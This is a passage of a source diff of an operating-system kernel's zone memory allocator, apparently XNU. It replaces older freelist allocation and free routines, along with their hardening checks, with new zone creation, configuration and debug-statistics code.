page_meta->zm_page_count, &zone->allfree_page_count)) { - zone_accounting_panic(zone, "allfree_page_count wrap-around"); - } - } else { - zone_accounting_panic(zone, "countfree corruption"); - } + recs = (zone_btrecord_t *)recs_addr; + get_btlog_records(zone_ptr->zlog_btlog, recs, &numrecs); - if (!zone_has_index(zone, page_meta->zm_index)) { - zone_page_metadata_index_confusion_panic(zone, page, page_meta); - } + kr = vm_map_unwire(ipc_kernel_map, recs_addr, recs_addr + recs_size, FALSE); + assert(kr == KERN_SUCCESS); - element = zone_page_meta_get_freelist(zone, page_meta, page); + *recsp = (zone_btrecord_t *) create_vm_map_copy(recs_addr, recs_size, numrecs * sizeof *recs); + *recsCntp = numrecs; - vm_offset_t *primary = (vm_offset_t *) element; - vm_offset_t *backup = get_backup_ptr(zone_elem_size(zone), primary); + return KERN_SUCCESS; - /* - * since the primary next pointer is xor'ed with zp_nopoison_cookie - * for obfuscation, retrieve the original value back - */ - vm_offset_t next_element = *primary ^ zp_nopoison_cookie; - vm_offset_t next_element_primary = *primary; - vm_offset_t next_element_backup = *backup; +#else /* DEBUG || DEVELOPMENT */ +#pragma unused(host, name, recsp, recsCntp) + return KERN_FAILURE; +#endif /* DEBUG || DEVELOPMENT */ +} + + +#if DEBUG || DEVELOPMENT + +kern_return_t +mach_memory_info_check(void) +{ + mach_memory_info_t * memory_info; + mach_memory_info_t * info; + unsigned int num_info; + vm_offset_t memory_info_addr; + kern_return_t kr; + size_t memory_info_size, memory_info_vmsize; + uint64_t top_wired, zonestotal, total; - /* - * backup_ptr_mismatch_panic will determine what next_element - * should have been, and print it appropriately - */ - if (!zone_page_meta_is_sane_element(zone, page_meta, page, next_element, kind)) { - backup_ptr_mismatch_panic(zone, page_meta, page, element); - } + num_info = vm_page_diagnose_estimate(); + memory_info_size = num_info * sizeof(*memory_info); + memory_info_vmsize = round_page(memory_info_size); + kr = kmem_alloc(kernel_map, &memory_info_addr, memory_info_vmsize, VM_KERN_MEMORY_DIAG); + assert(kr == KERN_SUCCESS); - /* Check the backup pointer for the regular cookie */ - if (__improbable(next_element_primary != next_element_backup)) { - /* Check for the poisoned cookie instead */ - if (__improbable(next_element != (next_element_backup ^ zp_poisoned_cookie))) { - /* Neither cookie is valid, corruption has occurred */ - backup_ptr_mismatch_panic(zone, page_meta, page, element); - } + memory_info = (mach_memory_info_t *) memory_info_addr; + vm_page_diagnose(memory_info, num_info, 0); - /* - * Element was marked as poisoned, so check its integrity before using it. - */ - validate_bit = ZALLOC_ELEMENT_NEEDS_VALIDATION; - } else if (zone->zfree_clear_mem) { - validate_bit = ZALLOC_ELEMENT_NEEDS_VALIDATION; + top_wired = total = zonestotal = 0; + zone_foreach(z) { + zonestotal += zone_size_wired(z); } - /* Remove this element from the free list */ - zone_page_meta_set_freelist(page_meta, page, next_element); - - if (kind == ZONE_ADDR_FOREIGN) { - if (next_element == 0) { - /* last foreign element allocated on page, move to all_used_foreign */ - zone_meta_requeue(zone, &zone->pages_all_used_foreign, page_meta, kind); + for (uint32_t idx = 0; idx < num_info; idx++) { + info = &memory_info[idx]; + if (!info->size) { + continue; + } + if (VM_KERN_COUNT_WIRED == info->site) { + top_wired = info->size; + } + if (VM_KERN_SITE_HIDE & info->flags) { + continue; + } + if (!(VM_KERN_SITE_WIRED & info->flags)) { + continue; } - } else if (next_element == 0) { - zone_meta_requeue(zone, &zone->pages_all_used, page_meta, kind); - } else if (page_meta->zm_alloc_count == 0) { - /* remove from free, move to intermediate */ - zone_meta_requeue(zone, &zone->pages_intermediate, page_meta, kind); + total += info->size; } + total += zonestotal; - if (os_add_overflow(page_meta->zm_alloc_count, 1, - &page_meta->zm_alloc_count)) { - /* - * This will not catch a lot of errors, the proper check - * would be against the number of elements this run should - * have which is expensive to count. - * - * But zm_alloc_count is a 16 bit number which could - * theoretically be valuable to cause to wrap around, - * so catch this. - */ - zone_page_meta_accounting_panic(zone, page_meta, - "zm_alloc_count overflow"); - } - if (os_sub_overflow(zone->countfree, 1, &zone->countfree)) { - zone_accounting_panic(zone, "countfree wrap-around"); - } + printf("vm_page_diagnose_check %qd of %qd, zones %qd, short 0x%qx\n", + total, top_wired, zonestotal, top_wired - total); -#if VM_MAX_TAG_ZONES - if (__improbable(zone->tags)) { - vm_tag_t tag = zalloc_flags_get_tag(flags); - // set the tag with b0 clear so the block remains inuse - ZTAG(zone, element)[0] = (vm_tag_t)(tag << 1); - vm_tag_update_zone_size(tag, zone->tag_zone_index, - zone_elem_size(zone), waste); - } -#endif /* VM_MAX_TAG_ZONES */ -#if KASAN_ZALLOC - if (zone->percpu) { - zpercpu_foreach_cpu(i) { - kasan_poison_range(element + ptoa(i), - zone_elem_size(zone), ASAN_VALID); - } - } else { - kasan_poison_range(element, zone_elem_size(zone), ASAN_VALID); - } -#endif + kmem_free(kernel_map, memory_info_addr, memory_info_vmsize); - return element | validate_bit; + return kr; } -/* - * zalloc returns an element from the specified zone. - * - * The function is noinline when zlog can be used so that the backtracing can - * reliably skip the zalloc_ext() and zalloc_log_or_trace_leaks() - * boring frames. - */ -#if ZONE_ENABLE_LOGGING -__attribute__((noinline)) -#endif -void * -zalloc_ext( - zone_t zone, - zone_stats_t zstats, - zalloc_flags_t flags, - vm_size_t waste) -{ - vm_offset_t addr = 0; - vm_size_t elem_size = zone_elem_size(zone); - - /* - * KASan uses zalloc() for fakestack, which can be called anywhere. - * However, we make sure these calls can never block. - */ - assert(zone->kasan_fakestacks || - ml_get_interrupts_enabled() || - ml_is_quiescing() || - debug_mode_active() || - startup_phase < STARTUP_SUB_EARLY_BOOT); +extern boolean_t(*volatile consider_buffer_cache_collect)(int); - /* - * Make sure Z_NOFAIL was not obviously misused - */ - if ((flags & Z_NOFAIL) && !zone->prio_refill_count) { - assert(!zone->exhaustible && (flags & (Z_NOWAIT | Z_NOPAGEWAIT)) == 0); - } +#endif /* DEBUG || DEVELOPMENT */ -#if CONFIG_ZCACHE - /* - * Note: if zone caching is on, gzalloc and tags aren't used - * so we can always check this first - */ - if (zone_caching_enabled(zone)) { - addr = zcache_alloc_from_cpu_cache(zone, zstats, waste); - if (__probable(addr)) { - goto allocated_from_cache; - } +kern_return_t +mach_zone_force_gc( + host_t host) +{ + if (host == HOST_NULL) { + return KERN_INVALID_HOST; } -#endif /* CONFIG_ZCACHE */ -#if CONFIG_GZALLOC - if (__improbable(zone->gzalloc_tracked)) { - addr = gzalloc_alloc(zone, zstats, flags); - goto allocated_from_gzalloc; - } -#endif /* CONFIG_GZALLOC */ -#if VM_MAX_TAG_ZONES - if (__improbable(zone->tags)) { - vm_tag_t tag = zalloc_flags_get_tag(flags); - if (tag == VM_KERN_MEMORY_NONE) { - /* - * zone views into heaps can lead to a site-less call - * and we fallback to KALLOC as a tag for those. - */ - tag = VM_KERN_MEMORY_KALLOC; - flags |= Z_VM_TAG(tag); - } - vm_tag_will_update_zone(tag, zone->tag_zone_index); +#if DEBUG || DEVELOPMENT + /* Callout to buffer cache GC to drop elements in the apfs zones */ + if (consider_buffer_cache_collect != NULL) { + (void)(*consider_buffer_cache_collect)(0); } -#endif /* VM_MAX_TAG_ZONES */ - - lock_zone(zone); - assert(zone->z_self == zone); + zone_gc(ZONE_GC_DRAIN); +#endif /* DEBUG || DEVELOPMENT */ + return KERN_SUCCESS; +} - /* - * Check if we need another thread to replenish the zone or - * if we have to wait for a replenish thread to finish. - * This is used for elements, like vm_map_entry, which are - * needed themselves to implement zalloc(). - */ - if (__improbable(zone->prio_refill_count && - zone->countfree <= zone->prio_refill_count / 2)) { - zone_refill_asynchronously_locked(zone); - } else if (__improbable(zone->countfree == 0)) { - zone_refill_synchronously_locked(zone, flags); - if (__improbable(zone->countfree == 0)) { - unlock_zone(zone); - if (__improbable(flags & Z_NOFAIL)) { - zone_nofail_panic(zone); - } - goto out_nomem; - } - } +zone_t +zone_find_largest(void) +{ + uint32_t largest_idx = 0; + vm_offset_t largest_size = zone_size_wired(&zone_array[0]); - addr = zalloc_direct_locked(zone, flags, waste); - if (__probable(zstats != NULL)) { - /* - * The few vm zones used before zone_init() runs do not have - * per-cpu stats yet - */ - int cpu = cpu_number(); - zpercpu_get_cpu(zstats, cpu)->zs_mem_allocated += elem_size; -#if ZALLOC_DETAILED_STATS - if (waste) { - zpercpu_get_cpu(zstats, cpu)->zs_mem_wasted += waste; + zone_index_foreach(i) { + vm_offset_t size = zone_size_wired(&zone_array[i]); + if (size > largest_size) { + largest_idx = i; + largest_size = size; } -#endif /* ZALLOC_DETAILED_STATS */ } - unlock_zone(zone); - -#if ZALLOC_ENABLE_POISONING - bool validate = addr & ZALLOC_ELEMENT_NEEDS_VALIDATION; -#endif - addr &= ~ZALLOC_ELEMENT_NEEDS_VALIDATION; - zone_clear_freelist_pointers(zone, addr); -#if ZALLOC_ENABLE_POISONING - /* - * Note: percpu zones do not respect ZONE_MIN_ELEM_SIZE, - * so we will check the first word even if we just - * cleared it. - */ - zalloc_validate_element(zone, addr, elem_size - sizeof(vm_offset_t), - validate); -#endif /* ZALLOC_ENABLE_POISONING */ + return &zone_array[largest_idx]; +} -allocated_from_cache: -#if ZONE_ENABLE_LOGGING || CONFIG_ZLEAKS - if (__improbable(zalloc_should_log_or_trace_leaks(zone, elem_size))) { - zalloc_log_or_trace_leaks(zone, addr); - } -#endif /* ZONE_ENABLE_LOGGING || CONFIG_ZLEAKS */ +#endif /* !ZALLOC_TEST */ +#pragma mark zone creation, configuration, destruction +#if !ZALLOC_TEST -#if CONFIG_GZALLOC -allocated_from_gzalloc: -#endif -#if KASAN_ZALLOC - if (zone->kasan_redzone) { - addr = kasan_alloc(addr, elem_size, - elem_size - 2 * zone->kasan_redzone, zone->kasan_redzone); - elem_size -= 2 * zone->kasan_redzone; - } - /* - * Initialize buffer with unique pattern only if memory - * wasn't expected to be zeroed. - */ - if (!zone->zfree_clear_mem && !(flags & Z_ZERO)) { - kasan_leak_init(addr, elem_size); - } -#endif /* KASAN_ZALLOC */ - if ((flags & Z_ZERO) && !zone->zfree_clear_mem) { - bzero((void *)addr, elem_size); - } +static zone_t +zone_init_defaults(zone_id_t zid) +{ + zone_t z = &zone_array[zid]; - TRACE_MACHLEAKS(ZALLOC_CODE, ZALLOC_CODE_2, elem_size, addr); + z->z_wired_max = ~0u; + z->collectable = true; + z->expandable = true; + z->z_submap_idx = Z_SUBMAP_IDX_GENERAL; -out_nomem: - DTRACE_VM2(zalloc, zone_t, zone, void*, addr); - return (void *)addr; + lck_spin_init(&z->z_lock, &zone_locks_grp, LCK_ATTR_NULL); + STAILQ_INIT(&z->z_recirc); + return z; } -void * -zalloc(union zone_or_view zov) +static bool +zone_is_initializing(zone_t z) { - return zalloc_flags(zov, Z_WAITOK); + return !z->z_self && !z->z_destroyed; } -void * -zalloc_noblock(union zone_or_view zov) +void +zone_set_submap_idx(zone_t zone, unsigned int sub_map_idx) { - return zalloc_flags(zov, Z_NOWAIT); + if (!zone_is_initializing(zone)) { + panic("%s: called after zone_create()", __func__); + } + if (sub_map_idx > zone_last_submap_idx) { + panic("zone_set_submap_idx(%d) > %d", sub_map_idx, zone_last_submap_idx); + } + zone->z_submap_idx = sub_map_idx; } -void * -zalloc_flags(union zone_or_view zov, zalloc_flags_t flags) +void +zone_set_noexpand(zone_t zone, vm_size_t nelems) { - zone_t zone = zov.zov_view->zv_zone; - zone_stats_t zstats = zov.zov_view->zv_stats; - assert(!zone->percpu); - return zalloc_ext(zone, zstats, flags, 0); + if (!zone_is_initializing(zone)) { + panic("%s: called after zone_create()", __func__); + } + zone->expandable = false; + zone->z_wired_max = zone_alloc_pages_for_nelems(zone, nelems); } -void * -zalloc_percpu(union zone_or_view zov, zalloc_flags_t flags) +void +zone_set_exhaustible(zone_t zone, vm_size_t nelems) { - zone_t zone = zov.zov_view->zv_zone; - zone_stats_t zstats = zov.zov_view->zv_stats; - assert(zone->percpu); - return (void *)__zpcpu_mangle(zalloc_ext(zone, zstats, flags, 0)); + if (!zone_is_initializing(zone)) { + panic("%s: called after zone_create()", __func__); + } + zone->expandable = false; + zone->exhaustible = true; + zone->z_wired_max = zone_alloc_pages_for_nelems(zone, nelems); } -static void * -_zalloc_permanent(zone_t zone, vm_size_t size, vm_offset_t mask) +/** + * @function zone_create_find + * + * @abstract + * Finds an unused zone for the given name and element size. + * + * @param name the zone name + * @param size the element size (including redzones, ...) + * @param flags the flags passed to @c zone_create* + * @param zid_inout the desired zone ID or ZONE_ID_ANY + * + * @returns a zone to initialize further. + */ +static zone_t +zone_create_find( + const char *name, + vm_size_t size, + zone_create_flags_t flags, + zone_id_t *zid_inout) { - const zone_addr_kind_t kind = ZONE_ADDR_NATIVE; - struct zone_page_metadata *page_meta; - vm_offset_t offs, addr; - zone_pva_t pva; + zone_id_t nzones, zid = *zid_inout; + zone_t z; - assert(ml_get_interrupts_enabled() || - ml_is_quiescing() || - debug_mode_active() || - startup_phase < STARTUP_SUB_EARLY_BOOT); + simple_lock(&all_zones_lock, &zone_locks_grp); - size = (size + mask) & ~mask; - assert(size <= PAGE_SIZE); + nzones = (zone_id_t)os_atomic_load(&num_zones, relaxed); + assert(num_zones_in_use <= nzones && nzones < MAX_ZONES); - lock_zone(zone); - assert(zone->z_self == zone); + if (__improbable(nzones < ZONE_ID__FIRST_DYNAMIC)) { + /* + * The first time around, make sure the reserved zone IDs + * have an initialized lock as zone_index_foreach() will + * enumerate them. + */ + while (nzones < ZONE_ID__FIRST_DYNAMIC) { + zone_init_defaults(nzones++); + } + + os_atomic_store(&num_zones, nzones, release); + } + + if (zid != ZONE_ID_ANY) { + if (zid >= ZONE_ID__FIRST_DYNAMIC) { + panic("zone_create: invalid desired zone ID %d for %s", + zid, name); + } + if (flags & ZC_DESTRUCTIBLE) { + panic("zone_create: ID %d (%s) must be permanent", zid, name); + } + if (zone_array[zid].z_self) { + panic("zone_create: creating zone ID %d (%s) twice", zid, name); + } + z = &zone_array[zid]; + } else { + if (flags & ZC_DESTRUCTIBLE) { + /* + * If possible, find a previously zdestroy'ed zone in the + * zone_array that we can reuse. + */ + for (int i = bitmap_first(zone_destroyed_bitmap, MAX_ZONES); + i >= 0; i = bitmap_next(zone_destroyed_bitmap, i)) { + z = &zone_array[i]; - for (;;) { - pva = zone->pages_intermediate; - while (!zone_pva_is_null(pva)) { - page_meta = zone_pva_to_meta(pva, kind); - if (page_meta->zm_freelist_offs + size <= PAGE_SIZE) { - goto found; + /* + * If the zone name and the element size are the + * same, we can just reuse the old zone struct. + */ + if (strcmp(z->z_name, name) || zone_elem_size(z) != size) { + continue; + } + bitmap_clear(zone_destroyed_bitmap, i); + z->z_destroyed = false; + z->z_self = z; + zid = (zone_id_t)i; + goto out; } - pva = page_meta->zm_page_next; } - zone_refill_synchronously_locked(zone, Z_WAITOK); - } - -found: - offs = (page_meta->zm_freelist_offs + mask) & ~mask; - page_meta->zm_freelist_offs = offs + size; - page_meta->zm_alloc_count += size; - zone->countfree -= size; - if (__probable(zone->z_stats)) { - zpercpu_get(zone->z_stats)->zs_mem_allocated += size; - } + zid = nzones++; + z = zone_init_defaults(zid); - if (page_meta->zm_alloc_count >= PAGE_SIZE - sizeof(vm_offset_t)) { - zone_meta_requeue(zone, &zone->pages_all_used, page_meta, kind); + /* + * The release barrier pairs with the acquire in + * zone_index_foreach() and makes sure that enumeration loops + * always see an initialized zone lock. + */ + os_atomic_store(&num_zones, nzones, release); } - unlock_zone(zone); - - addr = offs + zone_pva_to_addr(pva); +out: + num_zones_in_use++; + simple_unlock(&all_zones_lock); - DTRACE_VM2(zalloc, zone_t, zone, void*, addr); - return (void *)addr; + *zid_inout = zid; + return z; } -static void * -_zalloc_permanent_large(size_t size, vm_offset_t mask) +__abortlike +static void +zone_create_panic(const char *name, const char *f1, const char *f2) { - kern_return_t kr; - vm_offset_t addr; - - kr = kernel_memory_allocate(kernel_map, &addr, size, mask, - KMA_KOBJECT | KMA_PERMANENT | KMA_ZERO, - VM_KERN_MEMORY_KALLOC); - if (kr != 0) { - panic("zalloc_permanent: unable to allocate %zd bytes (%d)", - size, kr); - } - return (void *)addr; + panic("zone_create: creating zone %s: flag %s and %s are incompatible", + name, f1, f2); } +#define zone_create_assert_not_both(name, flags, current_flag, forbidden_flag) \ + if ((flags) & forbidden_flag) { \ + zone_create_panic(name, #current_flag, #forbidden_flag); \ + } -void * -zalloc_permanent(vm_size_t size, vm_offset_t mask) +/* + * Adjusts the size of the element based on minimum size, alignment + * and kasan redzones + */ +static vm_size_t +zone_elem_adjust_size( + const char *name __unused, + vm_size_t elem_size, + zone_create_flags_t flags __unused, + uint32_t *redzone __unused) { - if (size <= PAGE_SIZE) { - zone_t zone = &zone_array[ZONE_ID_PERMANENT]; - return _zalloc_permanent(zone, size, mask); + vm_size_t size; + /* + * Adjust element size for minimum size and pointer alignment + */ + size = (elem_size + sizeof(vm_offset_t) - 1) & -sizeof(vm_offset_t); + if (size < ZONE_MIN_ELEM_SIZE) { + size = ZONE_MIN_ELEM_SIZE; } - return _zalloc_permanent_large(size, mask); -} -void * -zalloc_percpu_permanent(vm_size_t size, vm_offset_t mask) -{ - zone_t zone = &zone_array[ZONE_ID_PERCPU_PERMANENT]; - return (void *)__zpcpu_mangle(_zalloc_permanent(zone, size, mask)); +#if KASAN_ZALLOC + /* + * Expand the zone allocation size to include the redzones. + * + * For page-multiple zones add a full guard page because they + * likely require alignment. + */ + uint32_t redzone_tmp; + if (flags & (ZC_KASAN_NOREDZONE | ZC_PERCPU)) { + redzone_tmp = 0; + } else if ((size & PAGE_MASK) == 0) { + if (size != PAGE_SIZE && (flags & ZC_ALIGNMENT_REQUIRED)) { + panic("zone_create: zone %s can't provide more than PAGE_SIZE" + "alignment", name); + } + redzone_tmp = PAGE_SIZE; + } else if (flags & ZC_ALIGNMENT_REQUIRED) { + redzone_tmp = 0; + } else { + redzone_tmp = KASAN_GUARD_SIZE; + } + size += redzone_tmp * 2; + if (redzone) { + *redzone = redzone_tmp; + } +#endif + return size; } -void -zalloc_async(__unused thread_call_param_t p0, __unused thread_call_param_t p1) +/* + * Returns the allocation chunk size that has least framentation + */ +static vm_size_t +zone_get_min_alloc_granule( + vm_size_t elem_size, + zone_create_flags_t flags) { - zone_index_foreach(i) { - zone_t z = &zone_array[i]; - - if (z->no_callout) { - /* async_pending will never be set */ - continue; + vm_size_t alloc_granule = PAGE_SIZE; + if (flags & ZC_PERCPU) { + alloc_granule = PAGE_SIZE * zpercpu_count(); + if (PAGE_SIZE % elem_size > 256) { + panic("zone_create: per-cpu zone has too much fragmentation"); } - - lock_zone(z); - if (z->z_self && z->async_pending) { - z->async_pending = false; - zone_refill_synchronously_locked(z, Z_WAITOK); + } else if ((elem_size & PAGE_MASK) == 0) { + /* zero fragmentation by definition */ + alloc_granule = elem_size; + } else if (alloc_granule % elem_size == 0) { + /* zero fragmentation by definition */ + } else { + vm_size_t frag = (alloc_granule % elem_size) * 100 / alloc_granule; + vm_size_t alloc_tmp = PAGE_SIZE; + while ((alloc_tmp += PAGE_SIZE) <= ZONE_MAX_ALLOC_SIZE) { + vm_size_t frag_tmp = (alloc_tmp % elem_size) * 100 / alloc_tmp; + if (frag_tmp < frag) { + frag = frag_tmp; + alloc_granule = alloc_tmp; + } } - unlock_zone(z); } + return alloc_granule; } -/* - * Adds the element to the head of the zone's free list - * Keeps a backup next-pointer at the end of the element - */ -void -zfree_direct_locked(zone_t zone, vm_offset_t element, bool poison) +vm_size_t +zone_get_foreign_alloc_size( + const char *name __unused, + vm_size_t elem_size, + zone_create_flags_t flags, + uint16_t min_pages) { - struct zone_page_metadata *page_meta; - vm_offset_t page, old_head; - zone_addr_kind_t kind; - vm_size_t elem_size = zone_elem_size(zone); - - vm_offset_t *primary = (vm_offset_t *) element; - vm_offset_t *backup = get_backup_ptr(elem_size, primary); + vm_size_t adjusted_size = zone_elem_adjust_size(name, elem_size, flags, + NULL); + vm_size_t alloc_granule = zone_get_min_alloc_granule(adjusted_size, + flags); + vm_size_t min_size = min_pages * PAGE_SIZE; + /* + * Round up min_size to a multiple of alloc_granule + */ + return ((min_size + alloc_granule - 1) / alloc_granule) + * alloc_granule; +} - page_meta = zone_allocated_element_resolve(zone, element, &page, &kind); - old_head = zone_page_meta_get_freelist(zone, page_meta, page); +zone_t +zone_create_ext( + const char *name, + vm_size_t size, + zone_create_flags_t flags, + zone_id_t zid, + void (^extra_setup)(zone_t)) +{ + vm_size_t alloc; + uint32_t redzone; + zone_t z; - if (__improbable(old_head == element)) { - panic("zfree: double free of %p to zone %s%s\n", - (void *) element, zone_heap_name(zone), zone->z_name); + if (size > ZONE_MAX_ALLOC_SIZE) { + panic("zone_create: element size too large: %zd", (size_t)size); } -#if ZALLOC_ENABLE_POISONING - if (poison && elem_size < ZONE_MIN_ELEM_SIZE) { - assert(zone->percpu); - poison = false; + if (size < 2 * sizeof(vm_size_t)) { + /* Elements are too small for kasan. */ + flags |= ZC_KASAN_NOQUARANTINE | ZC_KASAN_NOREDZONE; } -#else - poison = false; -#endif + size = zone_elem_adjust_size(name, size, flags, &redzone); /* - * Always write a redundant next pointer - * So that it is more difficult to forge, xor it with a random cookie - * A poisoned element is indicated by using zp_poisoned_cookie - * instead of zp_nopoison_cookie + * Allocate the zone slot, return early if we found an older match. */ - - *backup = old_head ^ (poison ? zp_poisoned_cookie : zp_nopoison_cookie); + z = zone_create_find(name, size, flags, &zid); + if (__improbable(z->z_self)) { + /* We found a zone to reuse */ + return z; + } /* - * Insert this element at the head of the free list. We also xor the - * primary pointer with the zp_nopoison_cookie to make sure a free - * element does not provide the location of the next free element directly. + * Initialize the zone properly. */ - *primary = old_head ^ zp_nopoison_cookie; -#if VM_MAX_TAG_ZONES - if (__improbable(zone->tags)) { - vm_tag_t tag = (ZTAG(zone, element)[0] >> 1); - // set the tag with b0 clear so the block remains inuse - ZTAG(zone, element)[0] = 0xFFFE; - vm_tag_update_zone_size(tag, zone->tag_zone_index, - -((int64_t)elem_size), 0); + /* + * If the kernel is post lockdown, copy the zone name passed in. + * Else simply maintain a pointer to the name string as it can only + * be a core XNU zone (no unloadable kext exists before lockdown). + */ + if (startup_phase >= STARTUP_SUB_LOCKDOWN) { + size_t nsz = MIN(strlen(name) + 1, MACH_ZONE_NAME_MAX_LEN); + char *buf = zalloc_permanent(nsz, ZALIGN_NONE); + strlcpy(buf, name, nsz); + z->z_name = buf; + } else { + z->z_name = name; } -#endif /* VM_MAX_TAG_ZONES */ - - zone_page_meta_set_freelist(page_meta, page, element); - if (os_sub_overflow(page_meta->zm_alloc_count, 1, - &page_meta->zm_alloc_count)) { - zone_page_meta_accounting_panic(zone, page_meta, - "alloc_count wrap-around"); + if (__probable(zone_array[ZONE_ID_PERCPU_PERMANENT].z_self)) { + z->z_stats = zalloc_percpu_permanent_type(struct zone_stats); + } else { + /* + * zone_init() hasn't run yet, use the storage provided by + * zone_stats_startup(), and zone_init() will replace it + * with the final value once the PERCPU zone exists. + */ + z->z_stats = __zpcpu_mangle_for_boot(&zone_stats_startup[zone_index(z)]); } - zone->countfree++; - if (kind == ZONE_ADDR_FOREIGN) { - if (old_head == 0) { - /* first foreign element freed on page, move from all_used_foreign */ - zone_meta_requeue(zone, &zone->pages_any_free_foreign, page_meta, kind); - } - } else if (page_meta->zm_alloc_count == 0) { - /* whether the page was on the intermediate or all_used, queue, move it to free */ - zone_meta_requeue(zone, &zone->pages_all_free, page_meta, kind); - zone->allfree_page_count += page_meta->zm_page_count; - } else if (old_head == 0) { - /* first free element on page, move from all_used */ - zone_meta_requeue(zone, &zone->pages_intermediate, page_meta, kind); + alloc = zone_get_min_alloc_granule(size, flags); + + if (flags & ZC_KALLOC_HEAP) { + size_t rem = (alloc % size) / (alloc / size); + + /* + * Try to grow the elements size and spread them more if the remaining + * space is large enough. + */ + size += rem & ~(KALLOC_MINALIGN - 1); } -#if KASAN_ZALLOC - if (zone->percpu) { - zpercpu_foreach_cpu(i) { - kasan_poison_range(element + ptoa(i), elem_size, - ASAN_HEAP_FREED); - } + z->z_elem_size = (uint16_t)size; + z->z_chunk_pages = (uint16_t)atop(alloc); + if (flags & ZC_PERCPU) { + z->z_chunk_elems = (uint16_t)(PAGE_SIZE / z->z_elem_size); } else { - kasan_poison_range(element, elem_size, ASAN_HEAP_FREED); + z->z_chunk_elems = (uint16_t)(alloc / z->z_elem_size); + } + if (zone_element_idx(zone_element_encode(0, + z->z_chunk_elems - 1, ZPM_AUTO)) != z->z_chunk_elems - 1) { + panic("zone_element_encode doesn't work for zone [%s]", name); } -#endif -} - -/* - * The function is noinline when zlog can be used so that the backtracing can - * reliably skip the zfree_ext() and zfree_log_trace() - * boring frames. - */ -#if ZONE_ENABLE_LOGGING -__attribute__((noinline)) -#endif -void -zfree_ext(zone_t zone, zone_stats_t zstats, void *addr) -{ - vm_offset_t elem = (vm_offset_t)addr; - vm_size_t elem_size = zone_elem_size(zone); - bool poison = false; - - DTRACE_VM2(zfree, zone_t, zone, void*, addr); - TRACE_MACHLEAKS(ZFREE_CODE, ZFREE_CODE_2, elem_size, elem); #if KASAN_ZALLOC - if (kasan_quarantine_freed_element(&zone, &addr)) { - return; + z->z_kasan_redzone = redzone; + if (strncmp(name, "fakestack.", sizeof("fakestack.") - 1) == 0) { + z->kasan_fakestacks = true; } +#endif + /* - * kasan_quarantine_freed_element() might return a different - * {zone, addr} than the one being freed for kalloc heaps. - * - * Make sure we reload everything. + * Handle KPI flags */ - elem = (vm_offset_t)addr; - elem_size = zone_elem_size(zone); +#if __LP64__ + if (flags & ZC_SEQUESTER) { + z->z_va_sequester = true; + } #endif + /* ZC_CACHING applied after all configuration is done */ + if (flags & ZC_NOCACHING) { + z->z_nocaching = true; + } + + if (flags & ZC_PERCPU) { + /* + * ZC_ZFREE_CLEARMEM is forced because per-cpu zones allow for + * pointer-sized allocations which poisoning doesn't support. + */ + zone_create_assert_not_both(name, flags, ZC_PERCPU, ZC_ALLOW_FOREIGN); + z->z_percpu = true; + z->gzalloc_exempt = true; + z->z_free_zeroes = true; + } + if (flags & ZC_ZFREE_CLEARMEM) { + z->z_free_zeroes = true; + } + if (flags & ZC_NOGC) { + z->collectable = false; + } + if (flags & ZC_NOENCRYPT) { + z->z_noencrypt = true; + } + if (flags & ZC_ALIGNMENT_REQUIRED) { + z->alignment_required = true; + } + if (flags & ZC_NOGZALLOC) { + z->gzalloc_exempt = true; + } + if (flags & ZC_NOCALLOUT) { + z->no_callout = true; + } + if (flags & ZC_DESTRUCTIBLE) { + zone_create_assert_not_both(name, flags, ZC_DESTRUCTIBLE, ZC_ALLOW_FOREIGN); + z->z_destructible = true; + } -#if CONFIG_ZLEAKS /* - * Zone leak detection: un-track the allocation + * Handle Internal flags */ - if (__improbable(zone->zleak_on)) { - zleak_free(elem, elem_size); + if (flags & ZC_ALLOW_FOREIGN) { + z->z_allows_foreign = true; } -#endif /* CONFIG_ZLEAKS */ + if ((ZSECURITY_OPTIONS_SUBMAP_USER_DATA & zsecurity_options) && + (flags & ZC_DATA_BUFFERS)) { + z->z_submap_idx = Z_SUBMAP_IDX_BAG_OF_BYTES; + } + if (flags & ZC_KASAN_NOQUARANTINE) { + z->kasan_noquarantine = true; + } + /* ZC_KASAN_NOREDZONE already handled */ -#if CONFIG_ZCACHE /* - * Note: if zone caching is on, gzalloc and tags aren't used - * so we can always check this first + * Then if there's extra tuning, do it */ - if (zone_caching_enabled(zone)) { - return zcache_free_to_cpu_cache(zone, zstats, (vm_offset_t)addr); + if (extra_setup) { + extra_setup(z); } -#endif /* CONFIG_ZCACHE */ + /* + * Configure debugging features + */ #if CONFIG_GZALLOC - if (__improbable(zone->gzalloc_tracked)) { - return gzalloc_free(zone, zstats, addr); + gzalloc_zone_init(z); /* might set z->gzalloc_tracked */ + if (z->gzalloc_tracked) { + z->z_nocaching = true; } -#endif /* CONFIG_GZALLOC */ - +#endif #if ZONE_ENABLE_LOGGING - if (__improbable(DO_LOGGING(zone))) { - zfree_log_trace(zone, elem); + if (!z->gzalloc_tracked && num_zones_logged < max_num_zones_to_log) { + /* + * Check for and set up zone leak detection if requested via boot-args. + * might set z->zone_logging + */ + zone_setup_logging(z); } #endif /* ZONE_ENABLE_LOGGING */ - - if (zone->zfree_clear_mem) { - poison = zfree_clear(zone, elem, elem_size); +#if VM_MAX_TAG_ZONES + if (!z->gzalloc_tracked && z->kalloc_heap && zone_tagging_on) { + static int tag_zone_index; + vm_offset_t esize = zone_elem_size(z); + z->tags = true; + z->tags_inline = (((page_size + esize - 1) / esize) <= + (sizeof(uint32_t) / sizeof(uint16_t))); + z->tag_zone_index = os_atomic_inc_orig(&tag_zone_index, relaxed); + assert(z->tag_zone_index < VM_MAX_TAG_ZONES); } +#endif - lock_zone(zone); - assert(zone->z_self == zone); - - if (!poison) { - poison = zfree_poison_element(zone, &zone->zp_count, elem); + /* + * Finally, fixup properties based on security policies, boot-args, ... + */ + if ((ZSECURITY_OPTIONS_SUBMAP_USER_DATA & zsecurity_options) && + z->kalloc_heap == KHEAP_ID_DATA_BUFFERS) { + z->z_submap_idx = Z_SUBMAP_IDX_BAG_OF_BYTES; } - - if (__probable(zstats != NULL)) { - /* - * The few vm zones used before zone_init() runs do not have - * per-cpu stats yet - */ - zpercpu_get(zstats)->zs_mem_freed += elem_size; +#if __LP64__ + if ((ZSECURITY_OPTIONS_SEQUESTER & zsecurity_options) && + (flags & ZC_NOSEQUESTER) == 0 && + z->z_submap_idx == Z_SUBMAP_IDX_GENERAL) { + z->z_va_sequester = true; + } +#endif + /* + * Clear entire element for non data zones and upto zp_min_size for + * data zones. + */ + if (z->z_submap_idx != Z_SUBMAP_IDX_BAG_OF_BYTES) { + z->z_free_zeroes = true; + } else if (size <= zp_min_size) { + 